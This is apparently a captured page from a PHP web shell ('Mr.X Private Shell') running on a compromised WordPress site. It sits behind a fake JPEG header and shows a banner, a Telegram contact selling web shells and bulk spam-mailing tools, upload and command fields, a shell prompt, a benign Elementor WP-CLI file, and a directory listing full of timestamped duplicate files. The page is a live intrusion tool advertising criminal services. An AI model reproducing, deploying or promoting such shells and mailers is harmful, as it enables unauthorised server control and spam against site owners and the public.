����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eliteafr@216.73.217.106: ~ $
<?php
namespace Elementor\Modules\WpCli;

use Elementor\Api;
use Elementor\Plugin;
use Elementor\TemplateLibrary\Source_Local;
use Elementor\Utils;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

/**
 * Elementor Page Builder cli tools.
 */
class Command extends \WP_CLI_Command {

	/**
	 * Flush the Elementor Page Builder CSS Cache.
	 *
	 * [--network]
	 *      Flush CSS Cache for all the sites in the network.
	 *
	 * [--regenerate]
	 *      Re-create the CSS files. Otherwise they will be created by a page visit.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor flush-css
	 *      - This will flush the CSS files for elementor page builder.
	 *
	 *  2. wp elementor flush-css --network
	 *      - This will flush the CSS files for elementor page builder for all the sites in the network.
	 *
	 *  3. wp elementor flush-css --regenerate
	 *      - This will flush the CSS files for elementor page builder and re-create the new CSS files.
	 *
	 * @since 2.1.0
	 * @access public
	 * @alias flush-css
	 */
	public function flush_css( $args, $assoc_args ) {
		$network = ! empty( $assoc_args['network'] ) && is_multisite();
		$should_regenerate = ! empty( $assoc_args['regenerate'] );

		if ( $network ) {
			$blog_ids = get_sites( [
				'fields' => 'ids',
				'number' => 0,
			] );

			foreach ( $blog_ids as $blog_id ) {
				switch_to_blog( $blog_id );

				$this->handle_flush( $should_regenerate, 'Flushed the Elementor CSS Cache for site - ' . get_option( 'home' ) );

				restore_current_blog();
			}
		} else {
			$this->handle_flush( $should_regenerate, 'Flushed the Elementor CSS Cache' );
		}
	}

	private function handle_flush( bool $should_regenerate, string $success_message ): void {
		Plugin::$instance->files_manager->clear_cache();

		if ( $should_regenerate ) {
			Plugin::$instance->files_manager->generate_css();
		}

		\WP_CLI::success( $success_message );
	}

	/**
	 * Print system info powered by Elementor
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor system-info
	 *      - This will print the System Info in JSON format
	 *
	 * @since 3.0.11
	 * @access public
	 * @alias system-info
	 */
	public function system_info() {
		echo wp_json_encode( \Elementor\Tracker::get_tracking_data() );
	}

	/**
	 * Replace old URLs with new URLs in all Elementor pages.
	 *
	 * [--force]
	 *      Suppress error messages. instead, return "0 database rows affected.".
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor replace-urls <old> <new>
	 *      - This will replace all <old> URLs with the <new> URL.
	 *
	 *  2. wp elementor replace-urls <old> <new> --force
	 *      - This will replace all <old> URLs with the <new> URL without throw errors.
	 *
	 * @access public
	 * @alias replace-urls
	 */
	public function replace_urls( $args, $assoc_args ) {
		if ( empty( $args[0] ) ) {
			\WP_CLI::error( 'Please set the `old` URL' );
		}

		if ( empty( $args[1] ) ) {
			\WP_CLI::error( 'Please set the `new` URL' );
		}

		try {
			$results = Utils::replace_urls( $args[0], $args[1] );
			\WP_CLI::success( $results );
		} catch ( \Exception $e ) {
			if ( isset( $assoc_args['force'] ) ) {
				\WP_CLI::success( '0 database rows affected.' );
			} else {
				\WP_CLI::error( $e->getMessage() );
			}
		}
	}

	/**
	 * Sync Elementor Library.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor sync-library
	 *      - This will sync the library with Elementor cloud library.
	 *
	 * @since 2.1.0
	 * @access public
	 * @alias sync-library
	 */
	public function sync_library( $args, $assoc_args ) {
		// TODO:
		// \WP_CLI::warning( 'command is deprecated since 2.8.0 Please use: wp elementor library sync' );

		$data = Api::get_library_data( true );

		if ( empty( $data ) ) {
			\WP_CLI::error( 'Cannot sync library.' );
		}

		\WP_CLI::success( 'Library has been synced.' );
	}

	/**
	 * Import template files to the Library.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor import-library <file-path>
	 *      - This will import a file or a zip of multiple files to the library.
	 *
	 * @since 2.1.0
	 * @access public
	 * @alias import-library
	 */
	public function import_library( $args, $assoc_args ) {
		// TODO:
		// \WP_CLI::warning( 'command is deprecated since 2.8.0 Please use: wp elementor library import' );

		if ( empty( $args[0] ) ) {
			\WP_CLI::error( 'Please set file path.' );
		}

		/** @var Source_Local $source */
		$source = Plugin::$instance->templates_manager->get_source( 'local' );

		$imported_items = $source->import_template( basename( $args[0] ), $args[0] );

		if ( is_wp_error( $imported_items ) ) {
			\WP_CLI::error( $imported_items->get_error_message() );
		}

		\WP_CLI::success( count( $imported_items ) . ' item(s) has been imported.' );
	}
}

Filemanager

Name Type Size Permission Actions
about-20260716003029.css File 25.95 KB 0644
about-20260716014612.css File 25.95 KB 0644
about-rtl-20260715235714.css File 25.99 KB 0644
about-rtl.css File 25.99 KB 0644
about-rtl.min.css File 19.85 KB 0644
about.css File 25.95 KB 0644
admin-menu-20260716025111.css File 18.34 KB 0644
admin-menu-rtl.css File 18.39 KB 0644
admin-menu-rtl.min.css File 14.89 KB 0644
admin-menu.css File 18.34 KB 0644
admin-menu.min-20260715131522.css File 14.87 KB 0644
admin-menu.min.css File 14.87 KB 0644
code-editor-20260715230615.css File 1.54 KB 0644
code-editor-20260716000033.css File 1.54 KB 0644
code-editor-20260716011041.css File 1.54 KB 0644
code-editor-rtl-20260716030759.css File 1.58 KB 0644
code-editor-rtl.css File 1.58 KB 0644
code-editor-rtl.min.css File 1.41 KB 0644
code-editor.css File 1.54 KB 0644
code-editor.min-20260716024520.css File 1.4 KB 0644
code-editor.min.css File 1.4 KB 0644
command.php File 4.59 KB 0644
common.css File 75.91 KB 0644
customize-controls-rtl.css File 69.91 KB 0644
customize-controls.min-20260715133711.css File 58.66 KB 0644
customize-controls.min-20260716014130.css File 58.66 KB 0644
customize-controls.min.css File 58.66 KB 0644
customize-widgets-20260715221455.css File 12.27 KB 0644
customize-widgets-20260716011406.css File 12.27 KB 0644
customize-widgets.css File 12.27 KB 0644
customize-widgets.min.css File 9.38 KB 0644
deprecated-media.min.css File 5.36 KB 0644
edit-rtl.css File 37.07 KB 0644
edit.css File 37.03 KB 0644
edit.min.css File 29.17 KB 0644
forms-20260716002230.css File 36.04 KB 0644
forms-20260716020740.css File 36.04 KB 0644
forms-rtl.min.css File 27.78 KB 0644
forms.css File 36.04 KB 0644
forms.min.css File 27.78 KB 0644
install-rtl-20260715144044.css File 6.05 KB 0644
install-rtl-20260716002918.css File 6.05 KB 0644
install-rtl.css File 6.05 KB 0644
l10n.css File 4.43 KB 0644
loadable-interface-20260716010339.php File 286 B 0644
loadable-interface-20260716011150.php File 286 B 0644
loadable-interface.php File 286 B 0644
login-rtl-20260715214237.css File 7.85 KB 0644
login-rtl.css File 7.85 KB 0644
media-20260715224620.css File 26.3 KB 0644
media.css File 26.3 KB 0644
person-20260715233430.php File 9.55 KB 0644
person-20260715235658.php File 9.55 KB 0644
person.php File 9.55 KB 0644
revisions-rtl.min-20260715153106.css File 8.13 KB 0644
revisions-rtl.min.css File 8.13 KB 0644
revisions.min.css File 8.11 KB 0644
settings-conditional.php File 992 B 0644
site-health.css File 6.09 KB 0644
site-icon.min.css File 3.84 KB 0644
themes-rtl.min.css File 31.94 KB 0644
themes.css File 40.78 KB 0644
widgets.min.css File 14.08 KB 0644
wordpress-helper.php File 512 B 0644
wp-admin-rtl.css File 490 B 0644
wp-admin.css File 395 B 0644
wp-admin.min-20260716011628.css File 490 B 0644
wp-admin.min-20260716022058.css File 490 B 0644
wp-admin.min.css File 490 B 0644
wrapper-20260715215153-20260716003604.php File 1.44 KB 0644
wrapper-20260715215153.php File 1.44 KB 0644
wrapper-20260716011233.php File 1.44 KB 0644
wrapper.php File 1.44 KB 0644